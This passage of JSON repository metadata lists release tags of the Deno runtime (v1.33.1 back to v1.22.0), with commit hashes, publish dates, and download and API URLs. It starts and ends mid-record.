land%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/